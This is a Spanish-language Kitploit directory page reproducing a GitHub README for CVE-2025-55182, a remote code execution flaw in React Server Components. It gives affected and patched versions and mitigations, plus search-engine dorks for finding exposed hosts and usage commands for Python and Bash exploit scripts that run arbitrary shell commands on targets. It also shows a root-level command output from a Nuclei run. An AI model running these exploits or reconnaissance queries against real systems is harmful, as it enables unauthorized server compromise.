Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182 — Una vulnerabilidad crítica de Ejecución Remota de Código (RCE) que afecta la implementación de los Componentes del Servidor de React (RSC) en múltiples paquetes, incluyendo. | Kitploit
Herramientas/GitHubGitHub/cyberleelawat/cve-2025-55182
Escáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubcyberleelawat/cve-2025-55182

CVE-2025-55182

Una vulnerabilidad crítica de Ejecución Remota de Código (RCE) que afecta la implementación de los Componentes del Servidor de React (RSC) en múltiples paquetes, incluyendo.

11hace 2 mesesAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55182 – Ejecución Remota de Código en React Server Components

React2Shell Banner CVE-2025-55182 CVE-2025-66478 CVSS

Creado por : Virendra Kumar

Empresa : Cyber Leelawat

Sitio web :

www.cyberleelawat.in

Overview

CVE-2025-55182 es una vulnerabilidad crítica de Ejecución Remota de Código (RCE) que afecta la implementación de React Server Components (RSC) en múltiples paquetes, incluyendo:

  • react-server-dom-webpack
  • react-server-dom-turbopack
  • react-server-dom-parcel

La vulnerabilidad existe debido a la deserialización insegura de cargas útiles enviadas a través del protocolo Flight interno utilizado por RSC. Cuando cierta entrada no confiable fluye a través de React Server Components mediante solicitudes HTTP, se puede desencadenar la ejecución de código en el lado del servidor.

Las versiones afectadas incluyen:

  • 19.0.0
  • 19.1.0
  • 19.1.1
  • 19.2.0

Las versiones parcheadas incluyen:

  • 19.0.1
  • 19.1.2
  • 19.2.1

Cómo funciona la vulnerabilidad (alto nivel)

React Server Components acepta solicitudes del lado del cliente que se analizan y deserializan en el backend. La vulnerabilidad surge de controles insuficientes en torno a la deserialización de datos entrantes, permitiendo que cargas útiles especialmente diseñadas sean interpretadas como componentes ejecutables del lado del servidor.

Cuando esto ocurre, puede producirse la ejecución arbitraria de JavaScript en el servidor, lo que puede llevar a un compromiso total del servidor dependiendo del entorno de alojamiento y los privilegios.


Causa Raíz

  • Falta de validación adecuada de entrada en los flujos del protocolo Flight de RSC.
  • Límite de confianza del servidor asumido incorrectamente como seguro.
  • Análisis inseguro en el lado del servidor a partir de entradas de usuario no confiables.

Impacto

Si se explota, un atacante podría ser capaz de:

  • Alcanzar ejecución remota de código
  • Ejecutar comandos arbitrarios del lado del servidor
  • Acceder a recursos de base de datos o del sistema operativo
  • Instalar malware o puertas traseras
  • Robar datos sensibles
  • Realizar movimiento lateral dentro de la infraestructura

Puntuación CVSS: 10.0 – CRÍTICA


Prueba Manual (Identificación Defensiva Segura)

Objetivo principal:

Verificar si la aplicación expone React Server Components y si se están utilizando versiones afectadas.

Paso 1 — Verificar la presencia de RSC mediante características de respuesta

root@kitploit:~
curl -I https://target.com/?__rsc=1

Reconocimiento en Google (palabras clave defensivas)

Estas palabras clave ayudan a identificar si un repositorio o aplicación web pública referencia componentes RSC.

root@kitploit:~
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"

Verificar:

  • ¿Están presentes las características de RSC?
  • ¿Paquetes visibles en los bundles del frontend?
  • ¿Referencias públicas de Git?

Ejemplo de Consultas Internas a Google (solo su propio alcance)

root@kitploit:~
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"

Destinado únicamente a la auditoría interna del dominio de su organización.


Shodan (huella tecnológica SEGURA)

Verifique el uso de framework expuesto, no la explotación de vulnerabilidades.

root@kitploit:~
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=

Clasificación de Tecnología FOFA Únicamente

root@kitploit:~
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"

Pruebas Automatizadas (Interno / Laboratorio)

Para automatizar el escaneo defensivo, clone la lógica de detección basada en plantillas para su propia evaluación de infraestructura:

root@kitploit:~
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182

Plantilla Nuclei

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

Exploit Python RCE (CVE-2025-55182.py)

Script de exploit RCE completo que ejecuta comandos arbitrarios y obtiene la salida.

Uso:

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

Exploit Bash

Instalación

root@kitploit:~
chmod +x scanner.sh

Uso

root@kitploit:~
# Scan with default command (id)
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d example.com -c "whoami"

# With full URL
./scanner.sh -d https://example.com -c "uname -a"

Opciones

  • -d, --domain - Dominio/URL objetivo (requerido)
  • -c, --command - Comando a ejecutar (por defecto: id)

Ejemplos

root@kitploit:~
# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com

# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"

# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"

Requisitos

  • Bash

  • curl

  • openssl

    Crédito: Script Bash y Python creado originalmente por @zack0x01 y @sickwell. Utilizado con agradecimiento.

Las plantillas dentro del repositorio están destinadas a:

  • identificación de versiones
  • comprobaciones de visibilidad
  • inventario de infraestructura
  • concienciación sobre vulnerabilidades

IMPORTANTE: Estas plantillas solo deben ejecutarse en sistemas de su propiedad o para los que tenga autorización de evaluación.


Nuclei (Declaración de Uso Defensivo)

Las plantillas de Nuclei incluidas en este repositorio están destinadas únicamente a:

  • validación de versiones de dependencias
  • huella indirecta
  • comprobaciones pasivas
  • auditoría de seguridad interna

Asegúrese de:

  • tener autorización por escrito
  • estar escaneando solo sus propios activos
  • cumplir con las leyes y políticas locales

Mitigaciones Recomendadas

Actualizar inmediatamente

Actualice a una de las versiones parcheadas:

  • 19.0.1
  • 19.1.2
  • 19.2.1

Si no puede parchear inmediatamente

  • deshabilitar temporalmente las características de RSC
  • aislar los componentes del servidor
  • implementar reglas WAF
  • restringir la superficie de red expuesta

🤝 Conéctate Conmigo

👨‍💻 Cyber Leelawat

Investigador de Seguridad • Entrenador de Ciberseguridad • Cazador de Recompensas

Lema: Zero Trust Full Secure 🚀

GitHub Instagram
LinkedIn WhatsApp Channel
WhatsApp Group

Conclusión

CVE-2025-55182 es actualmente una de las amenazas más críticas para las infraestructuras basadas en React. Debido al vector de explotación trivial y a la superficie de ataque no autenticada, se recomienda encarecidamente el parcheo inmediato. Cualquier organización que ejecute versiones afectadas de RSC debería considerar una prioridad de emergencia.


Aviso Legal / Ético

Este repositorio y documentación son para investigación defensiva y validación de seguridad de activos de su propiedad. Cualquier uso indebido puede ser ilegal. Usted es responsable de cumplir con las leyes y políticas organizacionales.

Hecho con ❤️ por Cyber Leelawat

Zero Trust Full Secure 🎯🔐

Descargar herramienta